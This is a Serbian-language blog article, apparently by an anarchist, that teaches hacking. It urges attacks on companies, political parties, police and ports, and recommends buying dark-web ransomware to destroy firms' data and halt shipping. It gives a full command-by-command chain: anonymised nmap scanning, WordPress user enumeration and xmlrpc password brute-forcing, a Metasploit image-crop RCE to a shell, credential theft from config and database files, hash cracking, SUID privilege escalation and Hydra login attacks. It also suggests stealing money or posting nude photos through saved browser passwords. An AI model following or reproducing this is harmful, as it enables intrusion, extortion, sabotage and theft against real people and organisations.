Hakovanje – prvi koraci
Rešio sam da napišem jedan članak o hakovanju, ali će uvodne napomene da budu malo duže.
Hakeri koji nisu anarhisti nisu politički obrazovani i oni pokušavaju da hakuju bilo koji server i vebsajt, bilo koji wifi ili mrežu ili telefon ili da ubace virus ili trojan u tvoj kompjuter kada skidaš besplatno krekovane programe koje ne želiš da platiš, ili tvoj kompjuter ako dodju do njega. Zato uče da programiraju da naprave virus, zato skeniraju na stotine servera i stotine vebsajtova, da nadju neki bug, bezbednosni propust. Anarhisti ne treba da hakuju bilo koga već predstavnike kapitalizma i države i njihove poltrone kao što su fašisti i ostali. To znači da ću ovde objasniti kako se hakuju pojedinačni sajtovi i serveri koji pripadaju kapitalističkim firmama, fašistima, političarima, partijama, raznim državnim organima kao što je uprava, policija, vojska, tajna služba i tako dalje. Najbitnija stvar kod hakovanja je da naučiš da budeš anoniman, da koristiš hakerske alatke kroz proxy to jest Tor, da te ne bi uhapsili ali treba da znaš da nisu sve alatke za hakovanje protivzakonite. Ima gomila sajtova koji rade isto što i hakerske alatke, naime moraš da skeniraš servere i sajtove da bi sakupio informacije da bi hakovao. Zato i sajtovi omogućavaju da sakupljaš informacije o serveru i vebsajtovima, i to nije protiv zakona. Ali pošto ima gomila alatki za hakovanje, bolje je da budeš anoniman celo vreme nego da koristiš neku alatku a da nisi anoniman.
Svaki server ima svoje log fajlove koji beleže tvoju IP adresu i šta si uradio, takodje i web serveri za sajtove kao apache i nginx imaju svoje log fajlove, takodje serveri imaju softvere za zaštitu koji ne samo da blokiraju tvoju IP adresu već mogu i da beleže IP adresu i šta si napao. To su firewall softveri i drugi softveri koji se zovu intrusion detection, ipak to imaju uglavnom velike firme koje plaćaju profesionalce da štite njihove servere, obični ljudi prave vebsajtove da prodju što jeftinije, to znači da ne instaliraju nikakvu zaštitu niti plaćaju backup servera i vebsajtova hosting kompanijama. Kada hakuješ vebsajt velike firme, imaju softver za zaštitu a imaju i backup, mogu da povrate ceo server sa gomilom vebsajtova za dan dva ako je server hakovan. Pojedinci pa i političke partije nemaju zaštitu niti backup, kada im hakuješ server ili vebsajt, ne mogu da povrate fajlove, da ponovo instaliraju server i vebsajt. Osim toga, mnogi ljudi su se preko veze zaposlili u ministarstvima, bibliotekama i drugim državnim institucijama, tako da i neki klinac od 15 godina može da hakuje Pentagon jer administratori nisu stručni. Takodje u bibliotekama kompjuteri su javni a administratori nisu stručni, u Kopenhagenu sam se ulogovao u tudji fejsbuk jer admin nije promenio podešavanja u chrome i firefox, oba brauzera čuvaju lozinke i možeš da se uloguješ u tudje naloge kao što je fejsbuk, gmail, online banka, paypal, i tako dalje. Možeš da ukradeš novac, da pošalješ pretnju političarima sa emaila ili fejsbuka, da objaviš gole slike na nečijem fejsbuku, sve zbog toga što admini nisu stručni. Da ti neko ne bi ukrao login podatke, uvek proveri na javnim kompjuterima da li firefox i chrome čuvaju tvoju lozinku, i na fakultetima i u bibliotekama možeš da dodješ do login podataka drugih ljudi, ne moraš da hakuješ fejsbuk. Biblioteka i fakultet u Kopenhagenu i univerzitetska biblioteka u Beogradu imaju brauzere koji čuvaju lozinke za emailove, fejsbuk i paypal i sve ostale vebsajtove. Ako želiš da se zaštitiš, moraš da podesiš svoj laptop da se bootuje samo sa hard diska, ako ja, neki lopov ili policija mogu da ubacim usb ili cd da bootujem linux sa tvog kompjutera, mogu da resetujem lozinku i za windows i za linuks (tutorijal). Dok je postojao windows XP, koristio se ophcrack softver da se pronadje lozinka svih korisnika windowsa, sada se koristi linux da se resetuje windows lozinka na novijim verzijama windowsa. Kada resetujem lozinku, mogu da udjem u tvoj windows kao administrator i mogu da pregledam ceo kompjuter čak i ako si šifrovao hard disk, ako mogu ja, može i policija kad ti zaplene kompjuter. Postoji i android aplikacija da se resetuje windows lozinka (PassFab 4WinKey app), takodje ova aplikacija može da se instalira na USB i da se bootuje laptop ili kompjuter sa USBa i da se resetuje lozinka. Pošto policija može da resetuje lozinku i da udju u kompjuter, hakovanje se uvek radi tako da ne ostavljaš tragove na hard disku, i za hakovanje se koristi Linuks, ili Kali ili Parrot Linuks, zato se Kali ili Parrot instaliraju unutar virtualne mašine, onda možeš uvek da obrišeš mašinu i napraviš novu, i tako nema tragova šta si radio kad si hakovao. Dakle, treba da instaliraš Kali ili Parrot u virtuelnoj mašini a ne na hard disku. Da predjemo na konrektna objašnjenja, ja ću kao primer da navedem Kali linuks.
Prvo što moraš da uradiš je da skineš iso fajl Kali linuksa koji je otprilike 4 gigabajta, ako nemaš neograničeni internet kod kuće, možeš da odeš u tržni centar ida skineš veliki fajl preko njihovog javnog Wifi. Treba da izabereš verziju iso fajla koja je podobna za instalaciju na hard disku unutar virtuelne mašine a to je installer verzija, ja skidam iso fajl sa weekly Kali zato što su to fajlovi koji se update-uju svake nedelje.
To su sveži iso fajlovi i ne moraš mnogo fajlova da skineš kada radiš update nakon instalacije. Dakle, nakon instalacije uvek uradiš update da bi se skinule sveže baze podataka za hakerske alatke, u terminalu Kali linuksa ukucaš komandu sudo apt update && sudo apt upgrade. Kada si skinuo Kali iso fajl, treba da skineš Virtual Box i da ga instaliraš na Windowsu da bi napravio virtuelnu mašinu. Tu treba da znaš kako se instalira Virtuelna Mašina u Virtual Boxu, treba da dodeliš 50 GB hard disku u mašini, treba da dodeliš gigabajt memorije i odredjeni broj procesora, onda si napravio mašinu i samo izabereš iso fajl Kali linuksa da instaliraš na celom disku u VM, nakon instalacije moraš da otkačiš iso fajl ili da odeš u System tab da odštikliraš boot sa CD i Floppy, ja sam se jednom zeznuo pa sam se bootovao u iso fajl umesto u hard disk virtuelne mašine, video sam da nema prostora da instaliram šta hoću, disk VMa je bio totalno pun a imao sam 50 gigabajta, tako sam shvatio da koristim iso fajl od 4GB i da zato ne mogu da instaliram softvere, onda sam odštiklirao boot mašine sa CDa, tamo je bio zakačen iso fajl od 4GB, tako sam bootovao sa hard diska mašine i imao sam 50 gigabajta.
Ako želiš detaljno uputstvo kako da instaliraš Kali ili Parrot u virtual boxu, imaš lepo uputstvo na dokumentaciji hackthebox, prvo ide instalacija sa VM ware a ako odeš dole, videćeš instalaciju virtual boxa i parrota unutar mašine.
Inače, hackthebox je jedan od retkih sajtova koji dozvoljavaju besplatno da naučiš hakovanje na njihovim mašinama, imaju beplatan kurs za početnike, ako hoćeš da ideš u napredniju školu za hakera, moraš da platiš.
Kali naplaćuju od 800 dolara do 7000 dolara za školu koja traje godinu dana, hackthebox takodje ima opciju da platiš da učiš da budeš haker, postoje i sajtovi koji traže 15 dolara mesečno što nije mnogo. Na youtube možeš naći gomilu snimaka kako se hakuje ali većina snimaka pokazuje alatke koje nisu besplatne. Takodje hakeri koriste sajtove koji služe kao search engine, sajtovi mogu da pronadju podatke i o ljudima i o uredjajima, ali takvi sajtovi nisu besplatni (Shodan, Censys, ZoomEye). U svakom slučaju, učenje ljudi da hakuju nije protiv zakona jer se smatra da te uče kako hakeri rade da bi bio cyber security a ne haker, dakle, da bi bio security koji štiti firme i servere i sajtove, moraš da znaš kako hakeri rade svoj posao. Neki hakeri uče i da programiraju da bi hakovali vebsajt bez alatki za hakovanje, nauče php i python i mysql da bi hakovali sajtove, ti možeš da naučiš da koristiš alatke koje rade taj posao, ne moraš da naučiš php da bi hakovao vebsajt. Ne moraš da naučiš sve o mrežama da bi hakovao neku firmu i njihove kompjutere, dovoljno je da kupiš ransomware softver koji šifruje sve kompjutere u firmi, ali moraš da prevariš nekog u firmi da skine tvoj fajl na kompjuter, takav softver može da se kupi čak i za male pare kao što je 200 do 600 dolara, na crnom tržištu to jest na hakerskim sajtovima na dark webu iza tor mreže. Kada hakeri imaju takav softver onda šifruju kompjutere i traže bitcoine od firme da dobiju password da dešifruju kompjutere. Anarhisti ne moraju da traže novac osim ako žele novac za revolucionarne aktivnosti i organizaciju protesta protiv vlasti, anarhisti mogu da šifruju kompjutere kapitalističkih firmi, banaka, korporacija, jer su to firme kapitalista, onda ako firma nije uradila backup svih kompjutera, ne mogu da povrate šifrovane informacije. Tako naneseš trajnu štetu njihovom poslovanju, na primer velike luke u Hamburgu i drugim gradovima preko kompjutera organizuju prebacivanje kontejnera sa brodova, možeš da parališeš transport robe ako uništiš njihove kompjutere. Takodje možeš da hakuješ firme koje zagadjuju okolinu ili eksploatišu radnike. Samo jedna firma Maersk u Danskoj ima preko 600 brodova i zagadjuju okolinu više nego cela država. Ako hakuješ 3 velike firme koje prevoze robu od Azije do Evrope, paralisaćeš ceo transport robe za celu Evropu, tako možeš da parališeš kapitalizam u celoj Evropi a ne samo u jednom gradu. U svakom slučaju, ako te zanimaju takve stvari treba da nabaviš neki softver koji spada u grupu ransomware, možeš da kupiš na dark web black market sajtovima, tamo se prodaje sve i svašta, od droge preko dokumenata do hakovanih podataka i softvera kao što je ransomware. Treba da znaš i da ima dosta prevaranata, skemera, nemoj nikad da platiš proizvod unapred, bilo šta da kupuješ na dark webu, moraš da pronadješ escrow vebsajt gde stoje pare dok ti ne stigne proizvod, tek onda prodavac dobije bitcoine iz escrow vebsajta. Ako ti neko traži bitcoine unapred, znaj da je u pitanju prevarant. Meni je vlasnik sajta gde sam ubacio bitcoine ukrao bitcoine 300 dolara iako je sajt imao escrow i prodavac ne dobija pare unapred, administrator je poništio narudžbinu proizvoda i prebacio bitcoine sa mog naloga na svoju btc adresu. Tako da ima i ljudi koji su napravili vebsajt sa raznim proizvodima, da ubaciš pare da kupiš proizvod, čim ubaciš pare, on to prebaci na svoju bitcoin adresu. I policija i hakeri pokušavaju da provale server i vebsajt black marketa jer gomila ljudi prodaje drogu, hakeri hoće da ukradu veliku količinu bitcoina sa takvog sajta a policija hoće da ugasi sajt i da uhapsi vlasnika koji omogućava kupovinu i prodaju droge, dokumenata, kreditnih kartica, paypala i svega i svačega. Ahmia.fi je search engine na clearnetu za pretragu dark weba ali da bi posetio onion domene moraš da instaliraš tor browser.
Dakle, da se vratim na temu, kada si instalirao Kali u VM i restartovao VM, treba da se uloguješ u Kali sa svojom lozinkom, i kad udješ, imaš terminal ikonicu sa leve gornje strane, klikni na ikonicu da ti se pojavi terminal i ukucaj sudo apt update && sudo apt upgrade. Onda će proći par minuta da se to obavi, zatim instaliraj tor, proxychains da budeš anoniman kad koristiš alatke za hakovanje:
sudo apt-get install tor proxychains
sudo gedit /etc/proxychains.conf
enable dynamic chaining and SOCKS5 with Tor’s default port (9050).
Sačuvaj i zatvori fajl. Ako nemaš gedit editor, koristi vim, u Vim pritisneš a da bi ukucao parametre i kad završiš, esc, pa onda :w! i onda :q! tako si izašao iz vim editora. sledeća komanda:
enable tor: sudo systemctl enable tor.service
startuj tor: sudo systemctl start tor.service
proveri da li radi: sudo systemctl status tor.service
da vidimo da smo anonimni, ukucamo u terminal: curl https://ifconfig.so
i dobicemo IP adresu kao na primer 45.138.16.240, onda vidiš da li je tvoj IP ili si anoniman. Možeš pogledati video na youtube ako nisi uspeo da odradiš lepo posao: https://www.youtube.com/watch?v=NN9fQwiomAU
Sada kada smo anonimni, prvo skeniramo server ili vebsajt za portove, sa nmap, da vidimo šta je intalirano i da li je neki port otvoren.
Kotišćenje nmap nije protivzakonito, ali je bolje da celo vreme budeš anoniman.
sudo proxychains nmap -sV -f -D -n -Pn (IP-adresa nekog servera ili sajta) 45.138.16.240
komanda “f” služi da izbegneš firewall, a “D” služi da skeniraš sa različitih IP adresa da bi ostao neprimećen od strane softvera za detektovanje napada. Takodje da bi se izbegla detekcija, koristi se i komanda “-n” a takodje i “-Pn”. Ako hoćeš da menjaš svoju IP adresu, ukucaš RND:10. Ako hoćeš da dobiješ informaciju o operativnom sistemu ukucaš -A a ako hoćeš da skeniraš neke portove ubaciš komandu -p 80,443
ukucaj root lozinku ako ti traži, pošto si kucao sudo.
Izaći će ti rezultat skeniranja, videćeš da piše denied za zatvorene portove i open za otvorene portove. pisaće ti i koji je servis za svaki otvoreni port.
Da skeniraš portove, možeš koristiti takodje i sajt: http://en.dnstools.ch/port-scan.html
Ako hoćeš da koristiš nmap da skeniraš ranjivost servera onda koristiš skriptu:
sudo proxychains nmap –script vuln 45.138.16.240 (dve crtice ispred script)
ako izadje neki error, probaj script bez S na kraju reči. Ako želiš da vidiš kako se zovu skripte da ih isprobaš, ima ih gomila pa biraj:
ls -la /usr/share/nmap/scripts
ako želiš možeš korisitti komandu help da saznaš šta radi neka skripta koju izabereš:
sudo nmap –scripts-help firewall-bypass.nse (dve crtice ispred script)
ima bolja skripta koja proverava FTP, komanda je:
sudo proxychains nmap –script ftp-anon.nse 45.138.16.240 (dve crtice ispred script)
Može da ti izadje rezultat: anonymous ftp login allowed. to znači da možeš izabrati koju hoćeš lozinku i da se uloguješ u FTP.
ftp 45.138.16.240
izaberi username i lozinku: anonymous, 12345, kada udješ u ftp, kucaš help da vidiš koje sve komande postoje.
Možeš i da koristiš grupu skripti tako da u jednoj komandi aktiviraš gomilu skripti, na primer “auth” skripta proverava da li na server ima neki servis i koji je username da se uloguješ.
sudo proxychains nmap –script auth 45.138.16.240 -sS (dve crtice ispred script)
ukucaj root lozinku i izaći će ti rezultat skeniranja, portovi i da li postoji neki login, validni kreditentiali, na primer 8180 apache tomcat:tomcat.
Zatim ukucaš IP i port i gledaš da li ima login stranica kao admin: 45.138.16.240:8180/admin, onda probaš tomcat korisničko ime i lozinku.
umesto “auth” možeš da koristiš i “malware” kategoriju skripti, da skeniraš da li je vebsajt zaražen sa nekim kodom.
Takodje može da se koristi i skripta “exploit” i može da ti izadje rezultat da neki bug može da se eksploatiše, na primer piše CSRF exploitable. Onda tražiš kako se hakuje taj bag CSRF. Može da napiše i da je port 21 FTP vulnerable exploitable, backdoor. exploit komanda je:
sudo proxychains nmap –script exploit 45.138.16.240 -sS -F
Nakon što smo skenirali server idemo na skeniranje vebsajtova. Skeniranje se na engleskom zove pentesting, tako da tražiš video lekcije za pentesting.
najbolji sajt za besplatno skeniranje domena je https://urlscan.io
Dobićeš IP adresu a sa desne strane i URL stranica tog sajta a ispod i od čega je napravljen vebsajt. Takodje, detaljni rezultat od čega je napravljen vebsajt se vidi na sajtu: https://builtwith.com/blic.rs
Ako vidiš da je vebsajt napravljen sa WordPress, onda koristiš alatku za skeniranje takvog sajta: wpscan.
Wpscan imaš u listi alatki u Kali samo idi tamo gde su softveri. Ako koristiš terminal, komanda je:
sudo proxychains wpscan –url domain.com –enumerate u
slovo u je za user, slovo p je za plugins, a t za theme.
amass se koristi za listanje subdomena, sudo apt-get install amass
sudo proxychains amass enum -d domain.com
ako skenira suviše dugo, prekineš sa ctrl c.
možemo da skeniramo sve direktorijume vebsajta:
sudo proxychains ffuf -u http://wordpress-site.com/FUZZ -w /usr/share/wordlists/dirbuster
izaći će lista i izaberemo jednu, na primer:
sudo proxychains ffuf -u http://wordpress-site.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Ako vidiš da piše Words 1628 onda dodaš filter na kraju komande koju smo koristili:
sudo proxychains ffuf -u http://wordpress-site.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fw 1628
dok se lista rezultat videćeš koje stranice ima vebsajt: login, admin, wp-content, itd. onda ukucamo admin na kraju domena da vidimo šta ćemo dobiti:
http://wordpress-site.com/admin i dobićemo dashbord za login, sledeći korak je da pronadjemo username za login a nakon toga se radi brute force na lozinku.
Da nadjemo korisnika idemo na json: http://wordpress-site.com/wp-json/wp/v2/users
Videćeš da piše ime admin, to je javno ime, a šta piše pod “slugin” to je korisničko ime za login, na primer “marko”. Na nekim sajtovima ima i više slugin naloga to jest korisničkih imena za login. Zatim koristimo alatku WPscan da napadnemo lozinku, dictionary attack, koristićemo fajl sa gomilom lozinki rockyou wordlist. ako napadneš login stranicu može da te blokira posle mnogo pokušaja, tako da ćemo napasti xmlrpc, šaljemo API zahteve, šaljemo lozinke kao zahteve. zato prvo proveravamo da li je omogućen xmlrpc na vebsajtu, ako jeste pisaće accepts POST.
curl http://wordpress-site.com/xmlrpc.php
pisaće: server accept POST requests only. zatim kucamo komandu za korisničko ime -U i putanju gde je fajl sa lozinkama -P .
sudo proxychains wpscan –url http://wordpress-site.com -U “marko” -P /usr/share/wordlists/rockyou.txt –password-attack xmlrpc
wpscan će ti napisati koja je verzija wordpresa, koja je tema instalirana i koji pluginovi. Zatim će pisati password attack i ako je pogodjena lozinka pisaće
success – marko / lozinka12345
onda se vraćamo na vebsajt da ukucamo login podatke, ime i lozinku:
http://wordpress-site.com/admin
ako marko nije administrator wordpress sajta, moći ćeš samo da dodaš nove vesti, nećeš moći da menjaš vebsajt. zato ćemo probati da nadjemo admina.
ako je verzija wordpressa pisala 5 a najnoviji je 6.5 onda možeš da hakuješ sajt jer nije update-ovan. onda ukucaš u google wordpress 5.0 exploit i dobićeš neke rezultate, na primer image remote code execution. onda nadješ infrmacije o tom exploitu na primer na github sajtu, piše broj exploita na exploit-db.com ali piše i CVE broj na primer iz 2019 godine i da se hakuje sa python skriptom. onda skineš python skriptu, u mom slučaju to je RCE_wordpress.py
koristiti se metasploit komanda: msfconcole, kada si ušao u msf6 exploit, kucaš komandu: search wordpress date:2019 i dobićeš listu gde piše
wp_crop_rce (crop image shell upload). onda iskopiraš path i zadaš metasploit komandu u konzoli:
use exploit/multi/http/wp_crop_rce
ući ćeš u modul i kucaš: show options
biramo komandu za target host: set RHOSTS wordpress-site.com
onda se ukuca IP adresa naše lokalne mreže, to možeš videti pored ikonice za mrežu desno gore u Kali linuksu: set LHOST 10.17.83.66
ako hoćeš da promeniš i listen lokalni port, komanda je: set LPORT 1560
zatim ubacimo i username i password: set USERNAME marko
set PASSWORD lozinka12345
zatim ukucaš komandu: run
pisaće autenticated with wordpress, image uploaded. Ako je uspešan rezultat pisaće: Meterpreter session 1 opened. Bićeš u meterpreter konzoli i ukucaš shell. Time si ušao u vebsajt u terminalu i ukucaš komandu da izlistaš fajlove: ls
ako se razumeš u python, možeš proveriti da li ima python i zadaš komandu da udješ u folder gde je wordpress sajt:
python3 -V
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
izaći će folder: www-data@blog:/var/www/wordpress$
ukucaš komandu whoami i dobićeš na primer www-data ali to nije administrator.
ali kada smo izlistali fajlove sa ls komandom, videli smo da postoji wp-config.php, u tom fajlu piše username i lozinka za bazu podataka. ukucamo komandu:
cat wp-config.php ta komanda pokazuje ceo sadržaj fajla, skrolujemo gore gde piše Mysql DB_USER i DB_PASSWORD. Iskopiraj lozinku i proveri da li koristi istu lozinku i za vebsajt, prvo izlistaj korisnike na serveru: cat /etc/passwd
na dnu fajla pisaće na primer patrik, onda kucaš: su patrik
i zatim kucaš lozinku koju si iskopirao od mysql DB, na primer 12345, pisaće failure ako nije tačna lozinka. Ali pošto smo videli mysql user i lozinku, možemo da se ulogujemo u bazu i da nadjemo tabelu u bazi gde piše svaki korisnik wordpress sajta, tamo možemo da promenimo lozinku za administratora. dakle, kucamo komandu za ulazak u mysql bazu:
mysql -u user(na primer patrik) -p
onda paste-ujemo lozinku koju smo kopirali. i ulazimo u bazu podataka.
kucamo komande: show databases; zatim ako piše blog kao ime baze kucaš use blog; zatim show tables; zatim select * from wp_users;
izlistaće jednog ili više usera wordpress sajta, pisaće na primer patrik i pored će biti njegova lozinka kriptovana hash-om. možeš da iskopiraš hash i da ideš na vebsajt
crackstation.net ubaci hash u polje i klikni crack hashes. ako vebsajt ne pokaže lozinku, kopiraj hash u fajl na kompjuteru hash.txt i probaj da pretvoriš hash u lozinku:
hashcat hash.txt –indetify
ako piše 400 phpass ukucaš komandu: hashcat hash.txt -m 400 /usr/share/wordlists/rockyou.txt
potrajaće dok hashcat pokuša da pretvori hash u lozinku. za to vreme možeš probati drugi način da dodješ do administratorske lozinke.
zadaćemo komandu da pronadjemo sve fajlove koji pripadaju adminu:
find / -type f -perm -u=s 2>/dev/null
izlistaće fajlove i treba da znaš da pronadješ koji nije sistemski fajl već od usera, na primer /usr/sbin/checker i kad ga ukucaš pisaće na primer Not and Admin, onda ukucaš
ltrace /usr/sbin/checker ako piše getenv admin, ukucaš echo $admin
ako je prazno, ukucaš export admin=1 pa opet echo $admin i dobićeš rezultat 1. sada možemo ponovo da probamo komandu ltrace.
ltrace /usr/sbin/checker dobićemo getenv admin, setuid 0, system bin/bash i sada možemo ponovo da kucamo /usr/sbin/checker i nećemo više biti www-data već root. ukucaj komandu whoami i dobićeš informaciju da li si root.
onda odemo na vebsajt koji pretvara lozinku u hash da napravimo hash za novu lozinku koju ćemo ubaciti u mysql bazu namesto hash administratora u tabeli wp_users. idi na vebsajt i pretvori lozinku koju hoćeš u hash, na primer 123456 i iskopiraj hash: https://codebeautify.org/wordpress-password-hash-generator dakle ponovo se ulogujemo u mysql bazu: mysql -u userPartrik -p
ukucaj lozinku, zatim use blog; show tables; select * from wp_users; izlistaće korisnike, treba da ubacimo novi hash:
UPDATE wp_users set user_pass=”ubaci hash ovde” where user_nicename=”patrik”;
pisaće Changed 1. ukucaj select * from wp_users;
videćeš rezultat, pored usera u bazi piše novi hash koji si ubacio i time si promenio lozinku. zato se vraćamo na login stranicu wordpressa da probamo novu lozinku.
http://wordpress-site.com/admin
user patrik lozinka 123456
ovaj put ćemo ući u vebsajt kao wordpress administrator i možemo da menjamo fajlove. da obrišemo deo ili ceo sajt ili dodamo svoj tekst.
Time smo uspešno hakovali wordpress vebsajt. Dakle, prvo si gledao da budeš anoniman, zatim si skenirao server i sajtove i kad si saznao da je wordpress vebsajt, hakovao si takav vebsajt. Obični ljudi uglavnom gledaju da prodju što jeftinije, zato koriste besplatan wordpress i ne plaćaju backup i neće moći da povrate vebsajt kada izbrišeš ceo sajt ili promeniš fajlove.
##########################
Osim wpscan za wordpress sajtove, hakeri koriste i sql injection za druge sajtove, DoS attack, Cross site scripting, traže da li vebsajt ima admin panel, Server-Side Request Forgery (SSRF), koriste Hydra da napadnu login stranicu vebsajta, možeš da skineš wordlistu lozinki sa interneta a možeš i sam da napraviš listu lozinki.
Koristi se brute force napad koji može da traje milion godina jer pokušava razne kombinacije slova i brojeva i koristi se dictionary attack koji traje kraće jer se probaju već gotove lozinke u text fajlu, takodje mogu da se skinu tekst fajlovi sa mogućim username. komanda za hydra alatku:
sudo proxychains hydra -L /path/top-usernames-shortlist.txt -P /path/14million-password-list.txt -u -f IPadresa/wordpress-site.com -s 443 http-post-form “/login.php:username=^USER^&password=^PASS^”:F=
pre nego što klikneš enter, start burpsuite (in applications, pentesting) i klikni na tab Proxy i klikni na intercept ON zatim idi u Firefox settings, network, namesti manual proxy, http 127.0.0.1 and port 8080.
Tako će firefox da ide kroz burpsuite. idi na login stranicu sajta u firefox i ukucaj test i lozinku test. ništa se neće desiti ali će u burpsuite da piše da je zahtev poslat serveru i pisaće tvoja IP adresa i username i lozinku koju si probao da ubaciš. Onda se vratimo u hydra komandu i posle login.php ubacimo
:username=^USER^&password=^PASS^
a posle PASS ubacimo stranicu koja se pojavljuje nakon što hydra pogodi lozinku, pritisnemo F12 na login stranici, selektujemo inspection tools, kada predjemo mišem preko login forme, u developer polju će takodje da bude selektovano polje gde se nalazi stranica koju tražimo. forma se zove login i to ubacujemo posle pass :F=
sada možeš da pritisneš enter da pokreneš hydra i pisaće pri kraju login:admin, password:password1
onda odštikliramo interception on u off u burpsuite i odemo na login stranicu u firefox i ukucamo dobijen username i lozinku. Tako smo ušli u vebsajt i možemo da radimo šta hoćemo.
Ako si tokom skeniranja video da IP adresa vebsajta pripada CDN kompaniji kao što je Akamai ili Cloudflare, onda je vebsajt sakriven iza proxy servera tih kompanija i moraš da zaobidješ njihov server da bi napao vebsajt i server. Prvo probaj vebsajt koji otkriva Ip adresu iza cloudflare: CrimeFlare. Ako nisi uspeo, onda proveriš istoriju IP adrese da vidiš da li postoji informacija da je vebsajt bio hostovan na nekoj drugoj IP adresi ili serveru pre cloudflare, tako možeš da vidiš pravu IP adresu vebsajta. Takodje možeš preko sajta za vadjenje hash iz favicon slike da tražiš druge sajtove koji imaju isti hash preko shodan.io search sajta, ukucaš domen sajta u vebsajt https://favicon-hash.kmsec.uk/ i dobićeš favicon i hash koji zatim tražiš u shodan ili censys. Shodan ima hash podatke miliona vebsajtova i možeš da dobiješ neki rezultat.
Kada tokom skeniranja nadjes neki bag, vulnarability, ukucas CVE broj u search nacionalne baze da dobiješ informacije o čemu se radi: https://nvd.nist.gov/vuln/search
Takodje i kad je vebsajt iza tor servera, na dark webu, traži se favicon.ico i onda se traži hash preko shodan, tako možeš da nadješ pravu IP adresu sajta koji je sakriven na dark webu ako nadješ sajtove sa istim hashom ako admin ima običan sajt pored onion sajta na istom serveru. zato profesionalci nemaju favicon u svom sajtu i instaliraju onion sajt da bude jedini na serveru. Nije dobro da imaš više sajtova na jednom serveru ako hoćeš da instaliraš vebsajtove iza tor servera. Većina altki za hakovanje neće da skenira onion domene, moraš da ukucaš običan domen ili IP adresu a sajtovi na dark webu imaju onion domen i kriju IP adresu iza tor servera. Zato ne možeš da skeniraš server jer ne znaš IP adresu, moraš da skeniraš sajt da vidiš od čega je napravljen i probaš error stranice sajta da vidiš da li će da izbaci informacije o sajtu i web serveru. Ja sam probao gomilu alatki da skeniram courier market (http://courier2w2hawxspntosy3wolvc7g7tcrwhitiu4irrupnpqub2bqxid.onion/) pošto mi je vlasnik sajta ukrao 300 dolara kad sam hteo da kupim neki proizvod na njegovom sajtu, prevarant je napravio gomilu proizvoda i kad depozituješ pare da kupiš nešto, on ti ukrade pare to jest bitcoine. Pošto hakerske alatke nisu dale rezultat, neke hoće da skeniraju onion sajtove ali piše da je otvoren samo port 80 i ne može da se sazna ni koji je server u pitanju. Zato sam otišao u source kod sajta (ctrl u) i gledao sam od čega je napravljen sajt, da bi prodavao gomilu proizvoda obično instalira ecommerce vebsajt sa shopping cart, ali on je izgleda napravio sajt od nule bez korišćenja skripti za ecommerce. Medjutim, video sam da ima folder sa slikama za sajt i onda sam ukucao na kraju domena /img/ folder bez same slike, zato mi je vebsajt izbacio error da nemam pravo pristupa tom folderu ali je vebsajt izdao informaciju, pisalo je da je web server Nginx. Onda sam tražio hakovanje Nginx servera ali sve što sam probao bilo je bezuspešno, administrator zna kako da konfiguriše server i nije napravio neki propust. Sada mi preostaje samo da probam http i druge injections u stranice vebsajta i da probam sqlmap da probam da hakujem mysql bazu.
Takodje, moraću da instaliram skripte sa github sajta (https://www.osintteam.com/osint-tools-for-the-dark-web/), programeri su napravili 20 skritpi za skreniranje i
exploit onion vebsajtova, ali moraš da skineš sktiptu i da instaliraš python, go i slične jezike jer većina skripti je napravljena sa python jezikom a neke skripte su napravljene pre 6 godina i ne možeš tako lako da ih instaliraš.
Takodje, registrovao sam se ponovo na courier market da vidim da li ima email kontakt, video sam da ima affiliate stranicu gde ljudima daje uputstva kako da reklamiraju njegov sajt i da zarade procenat od prodaje, referal link, u uputstvu piše koji email je napravio da bi reklamiro sajt po internetu, napravio je nalog na protonmail i koristio je xvideo porno sajt da postavi link ka svom sajtu. Ja ne mogu da dobijem informacije od protonmail firme o IP adresi email naloga ali policija bi mogla da ga uhapsi ako nije koristio tor browser da napravi nalog na protonmail, pa vebsajt na wixsite pa onda se registrovaovna porno sajtu da ubaci link ka svom sajtu. Dakle, na tri mesta je mogao da ostavi pravu IP adresu i može da bude uhapšen. Ako hoćeš da koristiš email da policija ne moževda nadje tvoju IP adresu, nemoj da koristiš obične email service sa clearneta čak i ako rade na tor mreži i kažu da se bore z a privatnost, svi oni saradjuju sa policijom pa i protonmail, koriste se sajtovi iza tor servera a koji šalju emailove na clearnet običan internet, ima dva besplatna sajta: http://mail2tor.com/ (ali mislim da više ne može da se registruju novi nalozi, izadje error kad pokušam da napravim email nalog) a postoji i https://dnmx.su/ oni često menjaju domen jer im policija gasi domen, ako uradiš bookmark njihovog onion domena, naći ćeš ih iako policija ugasi clearnet domen.
Postoji i cock.li i danwin1210.de ali svi oni saradjuju sa policijom ako mogu da te uhvate.
Postoji i TorBox koji ne saradjuje sa pandurima ali oni razmenjuju emailove samo sa par servera iza tor mreže, ne možeš poslati email na običan internet. Trebaće ti email koji ne saradjuje sa pandurima ako hoćeš da kontaktiraš hakovanu metu na primer da ti plate bitcoine ako si im šifrovao kompjutere sa ransomware i ako hoćeš da kupiš nešto na dark web preko emaila, moraš da registruješ anoniman email na dark webu. Na redditu možeš naći spisak onion email provajdera iza Tor mreže.
Možeš pročitati članak kako su uhvaćeni hakeri koji su šifrovali neku firmu i tražili bitcoine: https://blog.talosintelligence.com/de-anonymizing-ransomware-domains-on/
Ako želiš da naučiš više ili si zaglavio negde tokom hakovanja samo traži naslov lekcije na youtube a možeš i da tražiš generalano ethical hackers course, penetration testing, exploit, offensive security i slično.